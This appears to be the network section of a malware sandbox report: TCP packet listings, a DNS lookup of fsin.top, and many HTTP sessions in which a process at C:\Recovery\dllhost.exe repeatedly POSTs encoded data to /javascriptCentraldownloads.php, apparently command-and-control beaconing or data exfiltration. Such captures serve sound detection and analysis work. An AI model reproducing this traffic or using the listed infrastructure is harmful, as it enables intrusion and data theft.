                                                  Aug 1, 2024 07:39:31.734741926 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.735219955 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740170956 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.740207911 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.740245104 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740278959 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740443945 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.745331049 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.099679947 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.104769945 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.185749054 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.271465063 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.432764053 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.554054976 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.555099010 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.559573889 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.559998989 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.560102940 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.560102940 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.560199976 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.564963102 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.914846897 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.920175076 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.005156994 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.163058996 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.167409897 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.271466970 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.286066055 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.286803007 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.291347027 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.291404963 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.292236090 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.292305946 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.292407990 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.300323963 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.646517992 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.651554108 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.740765095 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.818356991 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.992466927 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.115334034 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.117953062 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.118583918 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123502016 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.123529911 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.123563051 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123590946 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123684883 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.128544092 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.474651098 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.479988098 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.589169979 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.663100004 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.855568886 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.946393967 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.947129965 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.054083109 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.055082083 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060317993 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.060475111 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.060585022 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060592890 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060709953 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.064608097 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.066030025 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.070204973 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.071166992 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.071234941 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.076674938 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.412215948 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.417515039 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.417557001 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.427829981 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.432779074 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.525702953 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.526138067 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.615228891 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.615282059 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.678776979 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.694612026 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.700221062 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.700279951 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.799017906 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.799830914 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804466009 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.804537058 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804842949 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.804905891 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804980040 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.809798002 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.162147045 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.168570995 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.247128963 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.461949110 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.462023973 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.498814106 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.611114025 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616096973 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.616182089 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616265059 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616283894 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.621855021 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.974755049 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.020911932 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.073223114 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.115677118 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:37.347706079 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:37.473522902 CEST4992080192.168.2.4172.67.203.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 1, 2024 07:37:24.658624887 CEST | 54197 | 53 | 192.168.2.4 | 1.1.1.1
Aug 1, 2024 07:37:25.096748114 CEST | 53 | 54197 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 1, 2024 07:37:24.658624887 CEST | 192.168.2.4 | 1.1.1.1 | 0x587f | Standard query (0) | fsin.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 1, 2024 07:37:25.096748114 CEST | 1.1.1.1 | 192.168.2.4 | 0x587f | No error (0) | fsin.top |  | 172.67.203.2 | A (IP address) | IN (0x0001) | false
Aug 1, 2024 07:37:25.096748114 CEST | 1.1.1.1 | 192.168.2.4 | 0x587f | No error (0) | fsin.top |  | 104.21.90.175 | A (IP address) | IN (0x0001) | false
                                                  • fsin.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Aug 1, 2024 07:37:25.244874001 CEST | 273 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
Aug 1, 2024 07:37:25.600461960 CEST | 344 | OUT | Data Raw: 00 06 01 00 06 00 01 05 05 06 02 01 02 07 01 05 00 0a 05 0c 02 00 03 0b 00 53 0c 07 06 0e 03 54 0e 05 07 0a 02 02 06 0b 0f 00 06 0b 06 02 06 07 06 53 0f 0a 0c 04 01 04 01 01 06 00 05 0a 05 5a 01 00 0d 5e 07 54 06 51 0f 01 0e 54 0d 56 0d 05 07 02
                                                  Data Ascii: STSZ^TQTVYPP\L~Ncz`r^wu^~|qBtt|]ZK{B^[lYvJ|CkUw^o^je~V@A{S\~r}
                                                  Aug 1, 2024 07:37:25.720122099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:25.988699913 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAzA6LbCMQ%2FgdrUOpLVcAabZDR6DuwqNo%2BLDpUg%2BgzOCseu7jq6tn1KW0K2Q3X7RsDUZuNMSIpx9oPiAzC%2BuKHnT1VvDX6Hctz%2FaS%2BQHLkhH7va2pBzP%2BueFAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379e76fc643cb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Aug 1, 2024 07:37:25.988744020 CEST | 718 | IN |
                                                  Aug 1, 2024 07:37:26.044601917 CEST | 249 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 384
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.291244984 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:26.291542053 CEST | 384 | OUT |
                                                  Aug 1, 2024 07:37:26.533801079 CEST | 729 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=romHFf3c7xH9pDB9iujj3ElhGtEC%2Brco1Kpiw3bGptODmG0PP9HJqHpJlHFmx4EikmAg0TfbFo3Gd5U3IJQtdECJepZN7CklwKBnfw6IDwmKk5Da3pAzUMjH3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ea19c843cb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Aug 1, 2024 07:37:26.564757109 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.664752007 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:26.665117979 CEST | 1284 | OUT |
                                                  Aug 1, 2024 07:37:26.912446022 CEST | 735 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oFqRvbznOHnzyPUCGHSNTwAEC%2BPheoWMj2V11%2Fg4APbu9H807w77f%2FtV4e1o3pjSJKt8WgI8QUBh9H2O5%2B8dPVXnyBCxWovWrkNgGQgPcUEAEcDfF8JChWHyDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ed5c4e43cb-EWR
                                                  alt-svc: h2=":443"; ma=60


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.4 | 49733 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:26.316231012 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.662242889 CEST | 1012 | OUT |
                                                  Aug 1, 2024 07:37:26.770591021 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:27.024939060 CEST | 594 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E176D%2BzDoz2egYZ2EOLAEk%2B2Nkc6TSd47kdTPwjYQJ6AATvO2i8P7BryG%2F%2Fw7vYEjr7%2FCDMLQH0B%2FPcHSqNDwcfIlXxF3OT5LZr0BxB%2FXXOf%2BnDras63Pj6hGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ee0c010f74-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.4 | 49736 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:27.196754932 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.4 | 49737 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:27.402259111 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:27.755934000 CEST | 1012 | OUT |
                                                  Aug 1, 2024 07:37:27.855858088 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.094624043 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Wc11c1qn031PnlWoReoS%2FBfx4qcoAsvbOUo4QHWq4tNTqDe6CDBRWyHgXk3mi9%2FUIjWko%2BVrLyR%2Fni319EKmc4MENoceB7poYqQtQbSGQNGKX86%2BKwsGgqAwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379f4cad74411-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.4 | 49738 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:28.284131050 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:28.630892992 CEST | 1012 | OUT |
                                                  Aug 1, 2024 07:37:28.729237080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.946094990 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.982858896 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOUpTIMu9yJN%2BisnZ16NQo0royfxc96B2ni0uJzQeQJrr7u31jWN6kHrrOy0kiIQQWfGpIU9YcVEU5ZlMLxh%2BkGepaK3TppX8vjIjmqxAHaTwe1T4E24sIWawA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379fa4c2642d3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.4 | 49740 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:29.135257959 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:29.490343094 CEST | 1008 | OUT |
                                                  Aug 1, 2024 07:37:29.601708889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:29.894970894 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcUPC0e5oay9hjyuUluHunEL1jdu4VMmV34GR7tWNm99GN5ltYkRrDrGAM%2FI6VE4phOKShMxzJ0hTU2mNNI8ZtbhTjnv7tbGz4Rq7rFUPSUJ%2FPx6dDuFdv5TYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ffb8277cf3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.4 | 49742 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:30.154596090 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:30.505877018 CEST | 1012 | OUT |
                                                  Aug 1, 2024 07:37:30.608850002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:30.858093023 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fzl0AniU5CwClymhZMrfcDz6mV10L0czDzz7RkjE5GC0bPEHkp7O2QGtOFNyps6R7dAKoghmMjDnVVC88kkOx99PGsinUReLvXvBb5ieL%2FAU2ZWKvne8Bv3SMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a060a805e6c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.4 | 49743 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:31.003865004 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:31.349776983 CEST | 1012 | OUT |
                                                  Aug 1, 2024 07:37:31.448272943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:31.726249933 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uoz%2FKyGNCKpNhVkZgNA76%2F7tEUb0LKYqS7L5HM2LLjpNmKVTueJi%2FuTT1q9eVHUW21LInmmppKmvezg3weMIiZQyQ1tioV0RDU5A9CInbva00ftctE9aYfhduQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a0b4f3841de-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.4 | 49744 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:31.860893965 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1000
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  9 | 192.168.2.4 | 49745 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:31.934628963 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:32.365102053 CEST | 1264 | OUT |
                                                  Aug 1, 2024 07:37:32.398417950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:32.768405914 CEST | 731 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
